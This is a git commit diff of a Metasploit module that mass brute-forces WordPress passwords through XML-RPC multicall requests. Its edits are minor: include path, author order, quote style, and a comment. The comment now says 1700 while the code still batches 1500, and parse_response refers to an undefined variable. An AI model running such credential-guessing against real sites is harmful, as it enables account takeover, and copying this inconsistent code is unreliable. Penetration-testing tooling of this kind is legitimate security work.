Add wordpress masive bruteforce using XMLRPC (wordpress API)

2015-11-09 18:23:15 +03:00 · 2015-11-09 18:23:15 +03:00 · 2bf57a3cf3
parent 9586f416a1
commit 2bf57a3cf3
1 changed files with 9 additions and 8 deletions
--- a/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb
+++ b/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb
@ -7,7 +7,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
-  include Msf::HTTP::Wordpress
+  include Msf::Exploit::Remote::HTTP::Wordpress
  def initialize(info = {})
    super(update_info(
@ -17,8 +17,8 @@ class Metasploit3 < Msf::Auxiliary
              'License'         => MSF_LICENSE,
              'Author'          =>
                  [
-                      'Sabri (@KINGSABRI)',           # MSF module
+                      'William (WCoppola@Lares.com)',
-                      'William (WCoppola@Lares.com)'  # Requester
+                      'Sabri (@KINGSABRI)'
                  ],
              'References'      =>
                  [
@ -56,8 +56,8 @@ class Metasploit3 < Msf::Auxiliary
    print_warning('Generating XMLs may take a while depends on the list file(s) size.') if passwords.size > 1500
    xml_payloads = []                          # Container for all generated XMLs
-    xml = ''
+    xml = ""
-    # Evil XML | Limit number of log-ins to 1500/request for wordpress limitation
+    # Evil XML | Limit number of log-ins to 1700/request for wordpress limitation
    passwords.each_slice(1500) do |pass_group|
      xml =  "<?xml version=\"1.0\"?>\n"
@ -113,7 +113,9 @@ class Metasploit3 < Msf::Auxiliary
  end
  def parse_response(res)
    resp.scan(/Incorrect username or password/)
  end
  def run
@ -168,4 +170,3 @@ class Metasploit3 < Msf::Auxiliary
      end end end
 end